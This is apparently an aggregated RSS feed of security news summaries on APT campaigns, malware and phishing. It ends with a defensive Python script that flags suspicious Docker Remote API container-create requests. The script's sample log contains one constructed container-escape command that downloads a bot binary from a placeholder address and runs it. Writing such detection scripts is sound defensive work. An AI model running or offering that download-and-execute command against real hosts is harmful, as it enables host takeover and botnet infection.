www.secnews.physaphae.fr This is the RSS 2.0 feed from www.secnews.physaphae.fr. It's a simple aggregated flow of multiple article sources. The list of sources can be found on www.secnews.physaphae.fr. 2025-05-12T07:12:01+00:00 www.secnews.physaphae.fr Dragos - CTI Society 3 Common Cyber Threat Intelligence (CTI) Challenges to Overcome in OT Cybersecurity Operational technology (OT) environments are vital systems that keep industries like manufacturing, energy, and transportation running. These systems are facing... The post 3 Common Cyber Threat Intelligence (CTI) Challenges to Overcome in OT Cybersecurity first appeared on Dragos.
2024-12-06T18:35:45+00:00 https://www.dragos.com/blog/3-common-cyber-threat-intelligence-cti-challenges-to-overcome-in-ot-cybersecurity/ www.secnews.physaphae.fr/article.php?IdArticle=8620794 False Threat,Industrial None 2.0000000000000000
RiskIQ - cyber risk firms (now Microsoft) Threat Actor Targets the Manufacturing industry with Lumma Stealer and Amadey Bot 2024-12-06T17:20:13+00:00 https://community.riskiq.com/article/d976ecc3 www.secnews.physaphae.fr/article.php?IdArticle=8620790 False Ransomware,Spam,Malware,Tool,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now Microsoft) Mauri Ransomware Threat Actors Exploiting Apache ActiveMQ Vulnerability (CVE-2023-46604) 2024-12-06T16:17:50+00:00 https://community.riskiq.com/article/ccb7bd15 www.secnews.physaphae.fr/article.php?IdArticle=8620767 False Ransomware,Tool,Vulnerability,Threat APT 45 2.0000000000000000 RiskIQ - cyber risk firms (now Microsoft) U.S. Organization in China Targeted by Attackers 2024-12-06T15:33:20+00:00 https://community.riskiq.com/article/9c09d15e www.secnews.physaphae.fr/article.php?IdArticle=8620737 False Malware,Tool,Threat None 2.0000000000000000 The Hacker News - The Hacker News is a hacking news blog (surprising, isn't it?) More_eggs MaaS Expands Operations with RevC2 Backdoor and Venom Loader The threat actors behind the More_eggs malware have been linked to two new malware families, indicating an expansion of its malware-as-a-service (MaaS) operation. This includes a novel information-stealing backdoor called RevC2 and a loader codenamed Venom Loader, both of which are deployed using VenomLNK, a staple tool that serves as an initial access vector for the deployment of follow-on 2024-12-06T13:52:00+00:00 https://thehackernews.com/2024/12/moreeggs-maas-expands-operations-with.html www.secnews.physaphae.fr/article.php?IdArticle=8620521 False Malware,Tool,Threat None 2.0000000000000000 Global Security Mag - French news site The main cybersecurity threats for 2025 Points of View
The main cybersecurity threats for 2025 By Rich Turner, EMEA President at CyberArk - Points of View
2024-12-06T13:20:51+00:00 https://www.globalsecuritymag.fr/les-principales-menaces-en-cybersecurite-pour-2025.html www.secnews.physaphae.fr/article.php?IdArticle=8620662 False Threat None 2.0000000000000000
The Hacker News - The Hacker News is a hacking news blog (surprising, isn't it?) Hackers Leveraging Cloudflare Tunnels, DNS Fast-Flux to Hide GammaDrop Malware The threat actor known as Gamaredon has been observed leveraging Cloudflare Tunnels as a tactic to conceal its staging infrastructure hosting a malware called GammaDrop. The activity is part of an ongoing spear-phishing campaign targeting Ukrainian entities since at least early 2024 that's designed to drop the Visual Basic Script malware, Recorded Future's Insikt Group said in a new analysis. 2024-12-06T12:33:00+00:00 https://thehackernews.com/2024/12/hackers-leveraging-cloudflare-tunnels.html www.secnews.physaphae.fr/article.php?IdArticle=8620499 False Malware,Threat None 2.0000000000000000 Schneier on Security - American cryptography researcher Detecting Pegasus Infections This tool seems to do a pretty good job. The company’s Mobile Threat Hunting feature uses a combination of malware signature-based detection, heuristics, and machine learning to look for anomalies in iOS and Android device activity or telltale signs of spyware infection. For paying iVerify customers, the tool regularly checks devices for potential compromise. But the company also offers a free version of the feature for anyone who downloads the iVerify Basics app for $1. These users can walk through steps to generate and send a special diagnostic utility file to iVerify and receive analysis within hours. Free users can use the tool once a month. iVerify’s infrastructure is built to be privacy-preserving, but to run the Mobile Threat Hunting feature, users must enter an email address so the company has a way to contact them if a scan turns up spyware—as it did in the seven recent Pegasus discoveries...
2024-12-06T12:09:12+00:00 https://www.schneier.com/blog/archives/2024/12/detecting-pegasus-infections.html www.secnews.physaphae.fr/article.php?IdArticle=8620625 False Malware,Tool,Threat,Mobile None 3.0000000000000000
Zataz - French security magazine Predictions 2025: AI, identity theft and cyber threats to watch The 2025 cybersecurity predictions are starting to show the tip of their mouse. The major trends ahead for 2025: increased use of Artificial Intelligence (AI), both to defend and to attack, and a worrying sophistication of social engineering threats.... 2024-12-06T10:10:54+00:00 https://www.zataz.com/predictions-2025-ia-usurpations-didentite/ www.secnews.physaphae.fr/article.php?IdArticle=8620569 False Threat,Prediction None 2.0000000000000000 RiskIQ - cyber risk firms (now Microsoft) MOONSHINE Exploit Kit and DarkNimbus Backdoor Enabling Earth Minotaur's Multi-Platform Attacks 2024-12-05T23:21:01+00:00 https://community.riskiq.com/article/699406a4 www.secnews.physaphae.fr/article.php?IdArticle=8620355 False Malware,Vulnerability,Threat,Mobile,Prediction None 2.0000000000000000 Dark Reading - Informationweek Branch Russia's 'BlueAlpha' APT Hides in Cloudflare Tunnels Cloudflare Tunnels is just the latest legitimate cloud service that cybercriminals and state-sponsored threat actors are abusing to hide their tracks. 2024-12-05T22:04:39+00:00 https://www.darkreading.com/cloud-security/russias-bluealpha-apt-cloudflare-tunnels www.secnews.physaphae.fr/article.php?IdArticle=8620316 False Threat,Cloud None 2.0000000000000000 RedCanary - Red Canary The dark cloud around GCP service accounts Google Cloud Platform security: How our threat research team gets from “huh, that's weird” to robust detection coverage 2024-12-05T21:53:59+00:00 https://redcanary.com/blog/threat-detection/gcp-service-accounts/ www.secnews.physaphae.fr/article.php?IdArticle=8620311 False Threat,Cloud None 2.0000000000000000 Recorded Future - Flux Recorded Future US org with 'significant presence in China' targeted by hackers, Symantec says The cybersecurity firm did not name the company but said the attack was “likely carried
out by a China-based threat actor, since some of the tools used in this attack have been previously associated with Chinese attackers.” 2024-12-05T21:18:49+00:00 https://therecord.media/us-org-with-presence-in-china-hacked-symantec www.secnews.physaphae.fr/article.php?IdArticle=8620292 False Tool,Threat None 3.0000000000000000 The Hacker News - The Hacker News is a hacking news blog (surprising, isn't it?) Critical Mitel MiCollab Flaw Exposes Systems to Unauthorized File and Admin Access Cybersecurity researchers have released a proof-of-concept (PoC) exploit that strings together a now-patched critical security flaw impacting Mitel MiCollab with an arbitrary file read zero-day, granting an attacker the ability to access files from susceptible instances. The critical vulnerability in question is CVE-2024-41713 (CVSS score: 9.8), which relates to a case of insufficient input 2024-12-05T20:26:00+00:00 https://thehackernews.com/2024/12/critical-mitel-micollab-flaw-exposes.html www.secnews.physaphae.fr/article.php?IdArticle=8620131 False Vulnerability,Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now Microsoft) Snowblind: The Invisible Hand of Secret Blizzard 2024-12-05T18:22:13+00:00 https://community.riskiq.com/article/53869980 www.secnews.physaphae.fr/article.php?IdArticle=8620235 False Malware,Tool,Threat None 2.0000000000000000 The Hacker News - The Hacker News is a hacking news blog (surprising, isn't it?) Hackers Target Uyghurs and Tibetans with MOONSHINE Exploit and DarkNimbus Backdoor A previously undocumented threat activity cluster dubbed Earth Minotaur is leveraging the MOONSHINE exploit kit and an unreported Android-cum-Windows backdoor called DarkNimbus to facilitate long-term surveillance operations targeting Tibetans and Uyghurs.
"Earth Minotaur uses MOONSHINE to deliver the DarkNimbus backdoor to Android and Windows devices, targeting WeChat, and possibly making it a]]> 2024-12-05T18:13:00+00:00 https://thehackernews.com/2024/12/hackers-target-uyghurs-and-tibetans.html www.secnews.physaphae.fr/article.php?IdArticle=8620079 False Threat,Mobile None 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Researchers Uncover 4-Month Cyberattack on U.S. Firm Linked to Chinese Hackers A suspected Chinese threat actor targeted a large U.S. organization earlier this year as part of a four-month-long intrusion. According to Broadcom-owned Symantec, the first evidence of the malicious activity was detected on April 11, 2024 and continued until August. However, the company doesn\'t rule out the possibility that the intrusion may have occurred earlier. "The attackers moved laterally]]> 2024-12-05T16:30:00+00:00 https://thehackernews.com/2024/12/researchers-uncover-4-month-cyberattack.html www.secnews.physaphae.fr/article.php?IdArticle=8620019 False Threat None 3.0000000000000000 Dark Reading - Informationweek Branch \\'Earth Minotaur\\' Exploits WeChat Bugs, Sends Spyware to Uyghurs The emerging threat actor, potentially a Chinese state-sponsored APT, is using the known exploit kit Moonshine in cross-platform attacks that deliver a previously undisclosed backdoor called "DarkNimbus" to ethnic minorities, including Tibetans.]]> 2024-12-05T15:58:36+00:00 https://www.darkreading.com/cyberattacks-data-breaches/earth-minotaur-exploits-wechat-bugs-spyware-uyghurs www.secnews.physaphae.fr/article.php?IdArticle=8620127 False Threat None 3.0000000000000000 Mandiant - Blog Sécu de Mandiant Bridging the Gap: Elevating Red Team Assessments with Application Security Testing Executive Summary Whether through a comprehensive Red Team engagement or a targeted external assessment, incorporating application security (AppSec) expertise enables organizations to better simulate 
the tactics and techniques of modern adversaries. This includes: Leveraging minimal access for maximum impact: There is no need for high privilege escalation. Red Team objectives can often be achieved with limited access, highlighting the importance of securing all internet-facing assets. Recognizing the potential of low-impact vulnerabilities through vulnerability chaining: Low- and medium-impact vulnerabilities can be exploited in combination to achieve significant impact. Developing your own exploits: Skilled adversaries or consultants will invest the time and resources to reverse-engineer and/or find zero-day vulnerabilities in the absence of public proof-of-concept exploits. Employing diverse skill sets: Red Team members should include individuals with a wide range of expertise, including AppSec. Fostering collaboration: Combining diverse skill sets can spark creativity and lead to more effective attack simulations. Integrating AppSec throughout the engagement: Offensive application security contributions can benefit Red Teams at every stage of the project. By embracing this approach, organizations can proactively defend against a constantly evolving threat landscape, ensuring a more robust and resilient security posture. Introduction In today's rapidly evolving threat landscape, organizations find themselves engaged in an ongoing arms race against increasingly sophisticated cyber criminals and nation-state actors. To stay ahead of these adversaries, many organizations turn to Red Team assessments, simulating real-world attacks to expose vulnerabilities before they are exploited. However, many traditional Red Team assessments typically prioritize attacking network and infrastructure components, often overlooking a critical aspect of modern attack surfaces: web applications. This gap hasn't gone unnoticed by cyber criminals.
In recent years, industry reports consistently highlight the evolving trend of attackers exploiting public-facing application vulnerabilities as a primary entry point into organizations. This aligns with Mandiant's observations of common tactics used by threat actors, as observed in our 2024 M-Trends Report 2024-12-05T14:00:00+00:00 https://cloud.google.com/blog/topics/threat-intelligence/red-team-application-security-testing/ www.secnews.physaphae.fr/article.php?IdArticle=8620098 False Tool,Vulnerability,Threat,Studies,Mobile,Prediction,Cloud,Commercial None 3.0000000000000000 HackRead - Cyber search “aiocpa” Python Package Exposed as Cryptocurrency Infostealer SUMMARY The machine learning-based threat-hunting system of leading threat intelligence and cybersecurity firm ReversingLabs (RL) recently detected malicious… 2024-12-05T13:46:51+00:00 https://hackread.com/aiocpa-python-package-cryptocurrency-infostealer/ www.secnews.physaphae.fr/article.php?IdArticle=8620070 False Threat None 2.0000000000000000 The Hacker News - The Hacker News is a hacking news blog (surprising, isn't it?) ANEL and NOOPDOOR Backdoors Weaponized in New MirrorFace Campaign Against Japan The China-linked threat actor known as MirrorFace has been attributed to a new spear-phishing campaign mainly targeting individuals and organizations in Japan since June 2024. The aim of the campaign is to deliver backdoors known as NOOPDOOR (aka HiddenFace) and ANEL (aka UPPERCUT), Trend Micro said in a technical analysis.
"An interesting aspect of this campaign is the comeback of a backdoor]]> 2024-12-05T13:00:00+00:00 https://thehackernews.com/2024/12/anel-and-noopdoor-backdoors-weaponized.html www.secnews.physaphae.fr/article.php?IdArticle=8619940 False Threat,Prediction,Technical None 2.0000000000000000 ProofPoint - Cyber Firms Cybersecurity Stop of the Month: \\'Tis the Season To Click Carefully-How Proofpoint Stopped a Dropbox Phishing Scam 2024-12-05T12:49:54+00:00 https://www.proofpoint.com/us/blog/email-and-cloud-threats/identify-prevent-dropbox-phishing-scams www.secnews.physaphae.fr/article.php?IdArticle=8620125 False Ransomware,Data Breach,Malware,Tool,Threat,Medical,Cloud None 2.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine Russian Hackers Exploit Rival Attackers\\' Infrastructure for Espionage Microsoft has found that Russian APT Secret Blizzard piggybacks on other cybercriminals\' infr4asytructure to conduct cyber espionage]]> 2024-12-05T11:45:00+00:00 https://www.infosecurity-magazine.com/news/russia-hackers-exploit-rival/ www.secnews.physaphae.fr/article.php?IdArticle=8620020 False Threat None 2.0000000000000000 SentinelOne (APT) - Cyber Firms Operation Digital Eye | Chinese APT Compromises Critical Digital Infrastructure via Visual Studio Code Tunnels Threat actors abused Visual Studio Code and Microsoft Azure infrastructure to target large business-to-business IT service providers in Southern Europe.]]> 2024-12-05T10:55:33+00:00 https://www.sentinelone.com/labs/operation-digital-eye-chinese-apt-compromises-critical-digital-infrastructure-via-visual-studio-code-tunnels/ www.secnews.physaphae.fr/article.php?IdArticle=8619983 False Threat None 3.0000000000000000 Intigrity - Blog The cyber threat landscape part 5: Staying safe with multi-layered defense Before diving into security controls or implementing bug bounty programs, to first establish a strong foundation in risk management and define your risk acceptance criteria. 
Defending your assets requires identifying and mapping each asset to the specific types and levels of threats that could impact them. Security cannot be approached reactively - securing assets is a strategi… 2024-12-05T00:00:00+00:00 https://blog.intigriti.com/business-insights/the-cyber-threat-landscape-part-5-staying-safe-with-multi-layered-defense www.secnews.physaphae.fr/article.php?IdArticle=8619913 False Threat None 3.0000000000000000 TrendMicro - Security Firm Blog MOONSHINE Exploit Kit and DarkNimbus Backdoor Enabling Earth Minotaur's Multi-Platform Attacks Trend Micro's monitoring of the MOONSHINE exploit kit revealed how it's used by the threat actor Earth Minotaur to exploit Android messaging app vulnerabilities and install the DarkNimbus backdoor for surveillance. 2024-12-05T00:00:00+00:00 https://www.trendmicro.com/en_us/research/24/l/earth-minotaur.html www.secnews.physaphae.fr/article.php?IdArticle=8619909 False Vulnerability,Threat,Mobile,Prediction None 2.0000000000000000 The Hacker News - The Hacker News is a hacking news blog (surprising, isn't it?) Russia-Linked Turla Exploits Pakistani Hackers' Servers to Target Afghan and Indian Entities The Russia-linked advanced persistent threat (APT) group known as Turla has been linked to a previously undocumented campaign that involved infiltrating the command-and-control (C2) servers of a Pakistan-based hacking group named Storm-0156 to conduct its own operations since 2022.
The activity, first observed in December 2022, is the latest instance of the nation-state adversary "embedding 2024-12-04T22:53:00+00:00 https://thehackernews.com/2024/12/russia-linked-turla-exploits-pakistani.html www.secnews.physaphae.fr/article.php?IdArticle=8619578 False Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now Microsoft) Malicious PyPI crypto pay package aiocpa implants infostealer code 2024-12-04T22:13:50+00:00 https://community.riskiq.com/article/2e9104a0 www.secnews.physaphae.fr/article.php?IdArticle=8619736 False Malware,Tool,Threat None 2.0000000000000000 Dark Reading - Informationweek Branch CISA Issues Guidance to Telecom Sector on Salt Typhoon Threat Individuals concerned about the privacy of their communications should consider using encrypted messaging apps and encrypted voice communications, CISA and FBI officials say. 2024-12-04T22:06:31+00:00 https://www.darkreading.com/cyberattacks-data-breaches/cisa-issue-guidance-telecoms-salt-typhoon-threat www.secnews.physaphae.fr/article.php?IdArticle=8619691 False Threat None 3.0000000000000000 Dark Reading - Informationweek Branch Russian FSB Hackers Breach Pakistan's APT Storm-0156 Parasitic advanced persistent threat Secret Blizzard accesses another APT's infrastructure and steals what it has stolen from South Asian government and military targets. 2024-12-04T20:47:46+00:00 https://www.darkreading.com/threat-intelligence/russian-fsb-hackers-breach-pakistan-storm-0156 www.secnews.physaphae.fr/article.php?IdArticle=8619717 False Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now Microsoft) Threat Assessment: Howling Scorpius (Akira Ransomware) 2024-12-04T20:38:31+00:00 https://community.riskiq.com/article/21eb0031 www.secnews.physaphae.fr/article.php?IdArticle=8619687 False Ransomware,Malware,Tool,Threat None 4.0000000000000000 Dark Reading - Informationweek Branch Pegasus Spyware Infections Proliferate Across iOS, Android Devices The notorious spyware from
Israel's NSO Group has been found targeting journalists, government officials, and corporate executives in multiple variants discovered in a threat scan of 3,500 mobile phones. 2024-12-04T20:06:00+00:00 https://www.darkreading.com/endpoint-security/pegasus-spyware-infections-ios-android-devices www.secnews.physaphae.fr/article.php?IdArticle=8619642 False Threat,Mobile None 2.0000000000000000 Veracode - Application Security Research, News, and Education Blog 5 Predictions About Managing Software Risks in 2025 How does the exponential advancement of technology impact the security landscape? It makes managing the fundamental risk of the technology, the software, exponentially more complex. From AI accelerating risky code production to cloud infrastructure increasing the attack surface, the world of application risk management is enduring a rapid transformation that needs immediate attention. Here are my predictions for 2025 and how to ride this wave of transformation to security as an enabler of progress rather than a barrier. 1. Exponentially Complex Risk Will Make Context Everything Since becoming CEO in April, nearly every week I'm speaking with a customer about concerns regarding the increased attack surface from the expansion of cloud technologies. To measure and manage these risks, you need context. Context allows you to answer critical questions, like: What are the risks? What is the likelihood a given threat will occur? … 2024-12-04T16:22:21+00:00 https://www.veracode.com/blog/secure-development/5-predictions-about-managing-software-risks-2025 www.secnews.physaphae.fr/article.php?IdArticle=8619694 False Threat,Prediction,Cloud None 3.0000000000000000 DarkTrace - DarkTrace: AI-based detection Phishing attacks surge over 600% in the buildup to Black Friday Black Friday and Cyber Monday are prime targets for cyber-attacks, as consumer spending rises and threat actors flock to take advantage.
Darktrace analysis reveals a surge in retail cyber scams at the opening of the peak 2024 shopping period, and the top brands that scammers love to impersonate. Plus, don't forget to check out our top tips for holiday-proofing your SOC before you clock off for the festive season. 2024-12-04T15:38:00+00:00 https://darktrace.com/blog/phishing-attacks-surge-in-buildup-to-black-friday www.secnews.physaphae.fr/article.php?IdArticle=8619453 False Threat None 1.00000000000000000000 Global Security Mag - French news site Black Friday triggers more than 600% rise in attempted retail cyber scams Special Reports
Black Friday triggers more than 600% rise in attempted retail cyber scams. Analysis from Darktrace's threat intelligence team using data from across the Darktrace customer fleet shows that during Black Friday week (25th to 29th November 2024) - Special Reports
2024-12-04T14:49:29+00:00 https://www.globalsecuritymag.fr/black-friday-triggers-more-than-600-rise-in-attempted-retail-cyber-scams.html www.secnews.physaphae.fr/article.php?IdArticle=8619524 False Threat None 1.00000000000000000000
Global Security Mag - French news site Nozomi Networks and Advens partner to deliver cybersecurity services to industrial and critical infrastructure environments Business
Nozomi Networks and Advens partner to deliver advanced cybersecurity services to industrial and critical infrastructure environments • Nozomi Networks' OT and IoT visibility, threat detection and risk management are now integrated into Advens' managed security services, available across Europe. • Among the customers benefiting from this MSSP partnership are the Paris Olympic Games - Business
2024-12-04T14:40:13+00:00 https://www.globalsecuritymag.fr/nozomi-networks-et-advens-s-associent-pour-offrir-des-services-de-cybersecurite.html www.secnews.physaphae.fr/article.php?IdArticle=8619494 False Threat,Industrial None 3.0000000000000000
IndustrialCyber - cyber risk firms for industrial Global cybersecurity agencies warn of Chinese espionage threat to telecom networks The U.S. Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Federal Bureau of Investigation (FBI), Australian...
2024-12-04T14:30:00+00:00 https://industrialcyber.co/critical-infrastructure/global-cybersecurity-agencies-warn-of-chinese-espionage-threat-to-telecom-networks/ www.secnews.physaphae.fr/article.php?IdArticle=8619551 False Threat None 2.0000000000000000
AlienVault Lab Blog - AlienVault is a major defensive player in IOCs How Regional Service Providers Can Grab a Larger Share of the Cybersecurity Market Managed detection and response (MDR) is forecasted to be the highest growth area of security services, with a projected 17.1 percent CAGR through 2028. This is in part due to the continued, acute need for support with threat monitoring, detection, and response. However, it’s also due to a growing need for help with risk identification, management and governance, exposure and vulnerability management, and incident readiness due to increasingly stringent requirements by regulators for reporting in these areas. Let’s compare that to the forecasted growth rate of network security products (a 9.9 percent 5-year CAGR, 2023-28, projected to reach $32.8 billion) and security software spending (a 13.4 percent 5-year CAGR, 2023-28, projected to reach $132.0 billion). What’s the storyline? The desire for help and expertise within security is as critical as the need for security products themselves. And, as the threat landscape grows ever-more formidable, especially with adversaries leveraging new AI tech, that need is likely not going to wane. With this growing demand, many, many different (and very large) providers have realized the opportunity in security services and are diving into the security services market for their piece of the “cyber money pie.” This includes everyone from software vendors, telecom companies, cloud service providers, IT service providers and traditional IT consulting firms to global MSPs (managed service providers) and MSSPs (managed security service providers). This is creating a very crowded market, and one in which business models are quickly changing so providers can better compete. For example, many organizations now see some of the big consultancies as a “one-stop shop” for everything from consulting to MDR.
In managed security services, for example, the top 10 MSSPs include (alphabetically): Accenture, Atos, AT&T (LevelBlue), Deloitte, Fortinet, Leidos, HCL Tech, NTT Data, PwC, and Tata Consultancy Services. Together, these providers hold 49 percent of MSS market share worldwide. Extending beyond the top 10 to the top 30 global MSS providers, the total “owned” market share jumps to 88 percent, leaving just 12 percent for the smaller, regional players. This raises several questions. Can the smaller, regional players compete against these big guns? Or do they have to remain satisfied with fighting over the remaining 12 percent market share globally (which equates to approximately $3.5 million worldwide for MSS in 2025)? Is it possible for smaller players to take a portion of the $26 million projected 2025 market share from the top 30? How can smaller, regional players win the security service game? Yes, smaller, regional service providers are going to be the most challenged as the services market continues its rapid evolution, especially as they try to keep up with technology changes, AI’s impact on service delivery, cyber skills shortages, and more.
However, they also have advantages, including the ability to: Specialize in industry or specific tech environments such as OT, cloud, or edge Provide regional context (including culture and language support) Partner with the larger players who can’t be everything to everyone This is wh 2024-12-04T14:00:00+00:00 https://levelblue.com/blogs/security-essentials/how-regional-service-providers-can-grab-a-larger-share-of-the-cybersecurity-market www.secnews.physaphae.fr/article.php?IdArticle=8619456 False Vulnerability,Threat,Industrial,Cloud Deloitte 2.0000000000000000 Checkpoint - Security hardware manufacturer From Trust to Technology: The Cyber Security Pillar of Modern Banking From leveraging zero-trust frameworks to educating customers, banks must adopt advanced security strategies to counter the evolving cyber threat landscape The International Day of Banks 2024 which falls on December 4th highlights the indispensable role of trust in banking. However, as banking transitions from physical ledgers to digital platforms, the foundation of trust faces unprecedented challenges from cyber threats, data breaches, and phishing scams which threaten to erode customer confidence, making cyber security not just a technological necessity but a trust enabler. Check Point Software Technologies Ltd. (NASDAQ: CHKP), a pioneer and global leader of cyber security solutions is forging […]
2024-12-04T13:00:20+00:00 https://blog.checkpoint.com/security/from-trust-to-technology-the-cyber-security-pillar-of-modern-banking/ www.secnews.physaphae.fr/article.php?IdArticle=8619428 False Threat None 1.00000000000000000000
Sygnia - CyberSecurity Firm How Persistent is an APT? Battling Three Threat Actors in a Single Environment Discover how, in the heat of defending against one adversary, we can unexpectedly encounter new, hidden threat actors.
2024-12-04T12:20:54+00:00 https://www.sygnia.co/webinar/how-persistent-is-an-apt-battling-three-threat-actors/ www.secnews.physaphae.fr/article.php?IdArticle=8629008 False Threat None 3.0000000000000000
Bleeping Computer - American magazine Russian hackers hijack Pakistani hackers' servers for their own attacks The notorious Russian cyber-espionage group Turla is hacking other hackers, hijacking the Pakistani threat actor Storm-0156's infrastructure to launch their own covert attacks on already compromised networks. [...] 2024-12-04T12:00:00+00:00 https://www.bleepingcomputer.com/news/security/russian-hackers-hijack-pakistani-hackers-servers-for-their-own-attacks/ www.secnews.physaphae.fr/article.php?IdArticle=8619938 False Threat None 3.0000000000000000 Bleeping Computer - American magazine Russian hackers hijack Pakistani hackers' servers for their own attacks The notorious Russian cyber-espionage group Turla is hacking other hackers, hijacking the Pakistani threat actor Storm-0156's infrastructure to launch their own covert attacks on already compromised networks. [...] 2024-12-04T12:00:00+00:00 https://www.bleepingcomputer.com/news/security/russian-turla-hackers-hijack-pakistani-apt-servers-for-cyber-espionage-attacks/ www.secnews.physaphae.fr/article.php?IdArticle=8619552 False Threat None 2.0000000000000000 The Hacker News - The Hacker News is a hacking news blog (surprising, isn't it?) Joint Advisory Warns of PRC-Backed Cyber Espionage Targeting Telecom Networks A joint advisory issued by Australia, Canada, New Zealand, and the U.S. has warned of a broad cyber espionage campaign undertaken by People's Republic of China (PRC)-affiliated threat actors targeting telecommunications providers.
"Identified exploitations or compromises associated with these threat actors\' activity align with existing weaknesses associated with victim infrastructure; no novel]]> 2024-12-04T11:37:00+00:00 https://thehackernews.com/2024/12/joint-advisory-warns-of-prc-backed.html www.secnews.physaphae.fr/article.php?IdArticle=8619306 False Threat None 2.0000000000000000 InformationSecurityBuzzNews - Site de News Securite Navigating Australia\\'s Evolving Cyber Threat Landscape: Insights on AI-Driven Scams, Ransomware, and more Cyber threats evolve rapidly in our current digital world-and Australia is no exception. AI-driven scams, ransomware, and social engineering tactics are only getting more sophisticated. In this interview with Gaidar Magdanurov, President of Acronis, we explore the latest trends in Australia\'s cybersecurity landscape, the unique vulnerabilities faced by the region, and how organizations, especially small [...]]]> 2024-12-04T05:12:42+00:00 https://informationsecuritybuzz.com/australia-evolv-cyber-threat-landscape/ www.secnews.physaphae.fr/article.php?IdArticle=8619262 False Ransomware,Vulnerability,Threat None 2.0000000000000000 The State of Security - Magazine Américain Tech Support Scams Exploit Google Ads to Target Users It\'s not a new technique, but that doesn\'t mean that cybercriminals cannot make rich rewards from SEO poisoning. SEO poisoning is the dark art of manipulating search engines to ensure that malware-laced adverts and dangerous websites appear high on users\' results - often impersonating legitimate businesses and organisations. But the simplest way of all to get a malicious website in front of a potential victim is to create a Google advertising account, and buy your way to the top of the search results. 
And, according to Jérôme Segura, senior director of research at security firm Malwarebytes... 2024-12-04T04:07:30+00:00 https://www.tripwire.com/state-of-security/tech-support-scams-exploit-google-ads-target-users www.secnews.physaphae.fr/article.php?IdArticle=8619350 False Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) Gafgyt Malware Broadens Its Scope in Recent Attacks ## Snapshot Researchers at Trend Micro Research have observed threat actors exploiting misconfigured Docker Remote API servers to deploy the Gafgyt malware, marking a shift from its traditional focus on IoT devices. ## Description The attackers create a Docker container using a legitimate "alpine" image to deploy the Gafgyt botnet malware, which can then launch DDoS attacks using various protocols such as UDP, TCP, and HTTP. The attack involves downloading a Gafgyt botnet binary with a hardcoded command-and-control (C&C) server IP address and executing it within the container. If the initial deployment fails, the attackers attempt to deploy another variant of the Gafgyt binary or a shell script that downloads and executes botnet binaries for different system architectures. The attackers use the "chroot" command to switch the container's root to the host filesystem mounted into it, which lets them read and modify the host's files and can lead to escalated privileges and control over the host system. The malware communicates with a C&C server and, based on the server's responses, performs actions such as executing DDoS attacks. The attackers also attempt to discover the local IP address of the victim host using Google's DNS server.
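The create-container step described in the Gafgyt entry above leaves a distinctive shape in any log taken in front of the Docker Remote API: a stock image, the host filesystem bind-mounted into the container, and a chroot into that mount. The script below is an added example (not Trend Micro's or RiskIQ's tooling) that triages such requests. The records are constructed, one JSON object per line with the fields a reverse proxy or audit hook in front of the daemon socket could record (remote_addr, method, path, parsed body); those field names and the TEST-NET addresses are assumptions.

```python
"""Triage Docker Remote API container-create requests for the host-escape
pattern: sensitive host path bind-mounted, privileged flag, chroot in Cmd.
Added example; field layout of the log records is assumed, not Docker's own."""
import json
import shlex

# Host paths whose bind mount into a container hands over the host.
SENSITIVE_HOST_PATHS = {"/", "/etc", "/root", "/proc", "/sys", "/var/run/docker.sock"}


def host_side(bind: str) -> str:
    """Bind syntax is host_path:container_path[:options]; return the host side."""
    return bind.split(":", 1)[0]


def mentions_chroot(cmd) -> bool:
    """Cmd/Entrypoint may be a list (exec form) or a string (shell form)."""
    if not cmd:
        return False
    parts = cmd if isinstance(cmd, list) else shlex.split(cmd)
    return any(p == "chroot" or "chroot " in p for p in parts)


def triage_create_request(body: dict) -> list:
    """Return findings for one POST /containers/create body, or [] if it looks benign."""
    findings = []
    host_cfg = body.get("HostConfig") or {}
    if host_cfg.get("Privileged"):
        findings.append("privileged container")
    for bind in host_cfg.get("Binds") or []:
        hp = host_side(bind)
        if hp in SENSITIVE_HOST_PATHS:
            findings.append(f"host path {hp} bind-mounted")
    if mentions_chroot(body.get("Cmd")) or mentions_chroot(body.get("Entrypoint")):
        findings.append("chroot in container command")
    return findings


def scan_api_log(lines):
    """Parse JSON records; return (remote_addr, image, findings) for every suspicious create."""
    hits = []
    for line in lines:
        rec = json.loads(line)
        if rec.get("method") != "POST" or "/containers/create" not in rec.get("path", ""):
            continue
        body = rec.get("body") or {}
        findings = triage_create_request(body)
        if findings:
            hits.append((rec.get("remote_addr"), body.get("Image"), findings))
    return hits


# Constructed sample log: a listing call, a normal web container, and a
# create request shaped like the Gafgyt deployment (TEST-NET addresses).
SAMPLE_LOG = [
    json.dumps({"remote_addr": "10.0.0.5", "method": "GET", "path": "/v1.43/containers/json"}),
    json.dumps({"remote_addr": "10.0.0.5", "method": "POST", "path": "/v1.43/containers/create",
                "body": {"Image": "nginx:1.25", "Cmd": ["nginx", "-g", "daemon off;"],
                         "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"]}}}),
    json.dumps({"remote_addr": "203.0.113.7", "method": "POST", "path": "/v1.43/containers/create",
                "body": {"Image": "alpine",
                         "Cmd": ["/bin/sh", "-c",
                                 "chroot /mnt /bin/sh -c 'wget -O /tmp/bot http://203.0.113.9/bot; chmod +x /tmp/bot; /tmp/bot'"],
                         "HostConfig": {"Binds": ["/:/mnt"], "Privileged": True}}}),
]

if __name__ == "__main__":
    for addr, image, findings in scan_api_log(SAMPLE_LOG):
        print(f"{addr} image={image}: {', '.join(findings)}")
```

Point it at whatever captures create requests in front of the daemon; the root fix remains not exposing the Remote API without TLS client authentication, since any unauthenticated caller can make this request.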
